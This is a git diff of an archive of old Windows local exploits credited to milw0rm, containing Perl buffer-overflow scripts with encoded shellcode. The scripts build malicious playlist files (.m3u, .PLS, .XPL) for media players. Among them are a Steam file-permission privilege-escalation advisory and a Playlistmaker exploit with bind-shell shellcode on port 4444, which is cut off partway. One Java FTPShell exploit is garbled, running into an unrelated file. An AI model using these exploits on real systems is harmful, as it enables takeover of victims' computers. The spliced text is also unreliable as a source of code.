-"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
-"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
-"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
-my $bof="A" x 992;
-my $eip_next="\x33\xBF\x96\x7C"; #
-my $nop="\x90" x 20;
-
-################################################################################################
-open(MYFILE,'>>radio.m3u');
-print MYFILE $bof.$eip_next.$nop.$shellcode;
-close(MYFILE);
-################################################################################################
-
-# milw0rm.com [2009-08-06]
+#!/usr/bin/perl
+#discoverd by:  germaya_x
+#soft:Playlistmaker1.5 (m3l,m3u files) local buffer overflow exploit (SEH)
+#Download: http://proletsoft.freeservers.com/mmb/playlistmaker.html
+#tested on: xp sp3 (EN)
+#bug date:August 06 09
+#greetz:hack4love ,devil fucker ,angel
+###############################################################################################
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+my $shellcode =
+"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
+"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
+"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
+"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
+"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
+"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
+"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
+"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
+"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
+"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
+my $bof="A" x 992;
+my $eip_next="\x33\xBF\x96\x7C"; #
+my $nop="\x90" x 20;
+
+################################################################################################
+open(MYFILE,'>>radio.m3u');
+print MYFILE $bof.$eip_next.$nop.$shellcode;
+close(MYFILE);
+################################################################################################
+
+# milw0rm.com [2009-08-06]
diff --git a/platforms/windows/local/938.cpp b/platforms/windows/local/938.cpp
index ec9e76b37..d7067a86f 100755
--- a/platforms/windows/local/938.cpp
+++ b/platforms/windows/local/938.cpp
@@ -749,6 +749,6 @@ int main(int argc, char **argv)
 
  printf("Make %s successful...\n", argv[2]);
  return 1;
-}
-
-// milw0rm.com [2005-04-14]
+}
+
+// milw0rm.com [2005-04-14]
diff --git a/platforms/windows/local/9386.txt b/platforms/windows/local/9386.txt
index 4ef18f343..26402c78b 100755
--- a/platforms/windows/local/9386.txt
+++ b/platforms/windows/local/9386.txt
@@ -1,69 +1,69 @@
-Steam (Multiple .exe's) Local Privilage Escalation
-
-By:
- MrDoug
- mrdoug13[at]gmail[dot]com
-
-Version Info:
- Steam windows client
- Built: Jun 30 2009, at 13:29:32
- Steam API: v008
- Steam Package versions: 54/894
-
-Greetz:
- Slappywag, Doomchip, Bolo, Eliwood, and the rest.
-
-Special Thanks:
- Jeremy Brown and Nine:Situations:Group...
- Their work led me to this.
-
-==================================================
-
-The latest Steam client, (and other Steam related executables)
-suffer the same privilage escelation issue we saw in Adobe Acrobat NOS
-the other day (http://milw0rm.com/exploits/9199).  This is particularly
-bad becuase, by default, Steam starts atomaticly.  That means that as
-soon as an administrator logs in... game over.
-
-==================================================
-
-POC:
-
-C:\>cacls "C:\Program Files\Steam\Steam.exe"
-C:\Program Files\Steam\Steam.exe BUILTIN\Users:F  <-- (Danger Will Robinson!!)
-                                 BUILTIN\Power Users:C
-                                 BUILTIN\Administrators:F
-                                 NT AUTHORITY\SYSTEM:F
-
-The executables listed below are also vulnerable, as well as many, MANY
-more that I have not mentioned.  See for yourself.
-
-%programfiles%\Steam\uninstall_css.exe
-%programfiles%\Steam\Unwise32.exe
-%programfiles%\Steam\GameOverlayUI.exe
-%programfiles%\Steam\uninstall_steam.exe
-%programfiles%\Steam\WriteMiniDump.exe
-%programfiles%\Steam\bin\SteamService.exe
-
---The following are dependant on what games are installed.
-
-%programfiles%\Steam\common\audiosurf\Audiosurf.exe
-%programfiles%\Steam\common\audiosurf\testapp.exe
-%programfiles%\Steam\common\audiosurf\engine\QuestViewer.exe
-%programfiles%\Steam\common\left 4 dead\left4dead.exe
-%programfiles%\Steam\steamapps\[username]\counter-strike source\hl2.exe
-%programfiles%\Steam\steamapps\[username]\half-life 2\hl2.exe
-%programfiles%\Steam\steamapps\[username]\garrysmod\hl2.exe
-
-...etc...etc...etc...
-
-There are probably 100 more, just look around.  I am yet to see an
-executable in the Steam directory with propor permissions.
-
-==================================================
-
-Exploit:
-
-So simple... write it yourself you silly goose :3
-
-# milw0rm.com [2009-08-07]
+Steam (Multiple .exe's) Local Privilage Escalation
+
+By:
+ MrDoug
+ mrdoug13[at]gmail[dot]com
+
+Version Info:
+ Steam windows client
+ Built: Jun 30 2009, at 13:29:32
+ Steam API: v008
+ Steam Package versions: 54/894
+
+Greetz:
+ Slappywag, Doomchip, Bolo, Eliwood, and the rest.
+
+Special Thanks:
+ Jeremy Brown and Nine:Situations:Group...
+ Their work led me to this.
+
+==================================================
+
+The latest Steam client, (and other Steam related executables)
+suffer the same privilage escelation issue we saw in Adobe Acrobat NOS
+the other day (http://milw0rm.com/exploits/9199).  This is particularly
+bad becuase, by default, Steam starts atomaticly.  That means that as
+soon as an administrator logs in... game over.
+
+==================================================
+
+POC:
+
+C:\>cacls "C:\Program Files\Steam\Steam.exe"
+C:\Program Files\Steam\Steam.exe BUILTIN\Users:F  <-- (Danger Will Robinson!!)
+                                 BUILTIN\Power Users:C
+                                 BUILTIN\Administrators:F
+                                 NT AUTHORITY\SYSTEM:F
+
+The executables listed below are also vulnerable, as well as many, MANY
+more that I have not mentioned.  See for yourself.
+
+%programfiles%\Steam\uninstall_css.exe
+%programfiles%\Steam\Unwise32.exe
+%programfiles%\Steam\GameOverlayUI.exe
+%programfiles%\Steam\uninstall_steam.exe
+%programfiles%\Steam\WriteMiniDump.exe
+%programfiles%\Steam\bin\SteamService.exe
+
+--The following are dependant on what games are installed.
+
+%programfiles%\Steam\common\audiosurf\Audiosurf.exe
+%programfiles%\Steam\common\audiosurf\testapp.exe
+%programfiles%\Steam\common\audiosurf\engine\QuestViewer.exe
+%programfiles%\Steam\common\left 4 dead\left4dead.exe
+%programfiles%\Steam\steamapps\[username]\counter-strike source\hl2.exe
+%programfiles%\Steam\steamapps\[username]\half-life 2\hl2.exe
+%programfiles%\Steam\steamapps\[username]\garrysmod\hl2.exe
+
+...etc...etc...etc...
+
+There are probably 100 more, just look around.  I am yet to see an
+executable in the Steam directory with propor permissions.
+
+==================================================
+
+Exploit:
+
+So simple... write it yourself you silly goose :3
+
+# milw0rm.com [2009-08-07]
diff --git a/platforms/windows/local/9409.pl b/platforms/windows/local/9409.pl
index bb3001dfe..f1c4c5dd7 100755
--- a/platforms/windows/local/9409.pl
+++ b/platforms/windows/local/9409.pl
@@ -1,42 +1,42 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# MediaCoder 0.7.1.4490 (.lst & .m3u) Universal Buffer overflow (SEH)
-# download :::http://www.mediacoderhq.com
-#################################################################################
-####Thanks for WwW.Sec-ArT.CoM/cc team ##and 3asfh.net team######################
-#################################################################################
-my $bof="\x41" x 764;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\x26\x59\x01\x66";#C:\Program Files\MediaCoder\libiconv-2.dll#p/p/r #unvi
-my $nop="\x90" x 20;
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-print $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-open(myfile,'>> HACK4LOVE.m3u');
-print myfile $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-
-# milw0rm.com [2009-08-10]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# MediaCoder 0.7.1.4490 (.lst & .m3u) Universal Buffer overflow (SEH)
+# download :::http://www.mediacoderhq.com
+#################################################################################
+####Thanks for WwW.Sec-ArT.CoM/cc team ##and 3asfh.net team######################
+#################################################################################
+my $bof="\x41" x 764;
+my $nsh="\xEB\x06\x90\x90";
+my $seh="\x26\x59\x01\x66";#C:\Program Files\MediaCoder\libiconv-2.dll#p/p/r #unvi
+my $nop="\x90" x 20;
+my $sec=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+print $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+open(myfile,'>> HACK4LOVE.m3u');
+print myfile $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+
+# milw0rm.com [2009-08-10]
diff --git a/platforms/windows/local/9426.java b/platforms/windows/local/9426.java
index 86d211ef9..46649d88a 100755
--- a/platforms/windows/local/9426.java
+++ b/platforms/windows/local/9426.java
@@ -1,40 +1,40 @@
-/*
- * FTPShell Client, Name Session Stack Overflow Exploit
- * Tested on Version 4.1 RC2 on Windows XP SP3
- * Vulnerable program download page : http://www.ftpshell.com/downloadclient.htm
- * Coded by zec
- * Feel yourself freely to get into touch : zec@bsdmail.com
- */
-
-package ftpbof;
-import java.io.DataOutputStream;
-import java.io.FileNotFoundException;
-import java.io.FileOutputStream;
-import java.io.IOException;
-/**
- * @author zec
- */
-public class Main {
-    public static void main(String[] args) throws IOException  {
-        /*  Shellcode calc.exe
-         *  jmp esp 0x7C86467B
-         */
-        byte[] data = new byte[2548];
-        for(int i = 1; i>LOAD PLAYLIST>>HACK4LOVE.PLS>>DOUBLE CLICK TO PLAY >BOOM CALC
-####################################################################
-my $bof="\x41" x 4108;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\x17\x07\x01\x10";#xaudio.dll####P/P/R
-my $nop="\x90" x 20;
-####################################################################
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-print $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-open(myfile,'>> HACK4LOVE.PLS');
-print myfile $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-
-# milw0rm.com [2009-08-13]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# pIPL V 2.5.0 (.PLS /.PL) Universal Local Buffer Exploit (SEH)
+# http://www.programmedintegration.com/files/pipl.exe
+# ## easy #### this work sooooooooo good############################
+####################################################################
+# USE>>LOAD PLAYLIST>>HACK4LOVE.PLS>>DOUBLE CLICK TO PLAY >BOOM CALC
+####################################################################
+my $bof="\x41" x 4108;
+my $nsh="\xEB\x06\x90\x90";
+my $seh="\x17\x07\x01\x10";#xaudio.dll####P/P/R
+my $nop="\x90" x 20;
+####################################################################
+my $sec=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+print $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+open(myfile,'>> HACK4LOVE.PLS');
+print myfile $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+
+# milw0rm.com [2009-08-13]
diff --git a/platforms/windows/local/9458.pl b/platforms/windows/local/9458.pl
index bcd94806e..972fde6c3 100755
--- a/platforms/windows/local/9458.pl
+++ b/platforms/windows/local/9458.pl
@@ -1,44 +1,44 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# Xenorate Media Player 2.6.0.0(.xpl)Universal Local Buffer Exploit (SEH)
-# http://www.softpedia.com/progDownload/Xenorate-Download-71701.html
-####################################################################
-## USE>>LOAD PLAYLIST>>HACK4LOVE.XPL>>>BOOM CALC
-####################################################################
-# ## easy #### this work sooooooooo good############################
-####################################################################
-my $bof="\x41" x 88;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\x4B\x3F\x01\x11";##bass.dll
-my $nop="\x90" x 20;
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-print $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-open(myfile,'>> HACK4LOVE.XPL');
-print myfile $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-
-# milw0rm.com [2009-08-18]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# Xenorate Media Player 2.6.0.0(.xpl)Universal Local Buffer Exploit (SEH)
+# http://www.softpedia.com/progDownload/Xenorate-Download-71701.html
+####################################################################
+## USE>>LOAD PLAYLIST>>HACK4LOVE.XPL>>>BOOM CALC
+####################################################################
+# ## easy #### this work sooooooooo good############################
+####################################################################
+my $bof="\x41" x 88;
+my $nsh="\xEB\x06\x90\x90";
+my $seh="\x4B\x3F\x01\x11";##bass.dll
+my $nop="\x90" x 20;
+my $sec=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+print $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+open(myfile,'>> HACK4LOVE.XPL');
+print myfile $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+
+# milw0rm.com [2009-08-18]
diff --git a/platforms/windows/local/9466.pl b/platforms/windows/local/9466.pl
index df387c53e..f15cff4ee 100755
--- a/platforms/windows/local/9466.pl
+++ b/platforms/windows/local/9466.pl
@@ -1,89 +1,89 @@
-# Playlistmaker version 1.51
-# Tested on Windows XP SP2 (English)
-# Exploit originally discovered by ThE g0bL!N/exploited by germaya_x
-
-# I could not get germaya_x's exploit to work with XP3.
-# The only useable p/p/r I could find was in oledlg.dll
-# which seems to be compiled with SafeSEH on in XP SP3.
-# However, oledlg.dll is useable in XP SP2.
-
-
-print "\n========================"
-print "Playlistmaker v1.5 (SEH)"
-print "Exploit written by Blake"
-print "Discovered by ThE g0bL!N"
-print "========================\n"
-
-# windows/shell_bind_tcp - 696 bytes
-# http://www.metasploit.com
-# Encoder: x86/alpha_mixed
-# EXITFUNC=seh, LPORT=4444, RHOST=
- 
-shellcode = ( 
-"\x89\xe2\xdb\xce\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
-"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
-"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
-"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
-"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b"
-"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x46\x44\x47\x54\x4c\x4b"
-"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x43\x31\x4a"
-"\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31"
-"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x46"
-"\x51\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43\x37"
-"\x49\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
-"\x4b\x46\x34\x47\x54\x47\x58\x43\x45\x4d\x35\x4c\x4b\x51\x4f"
-"\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c"
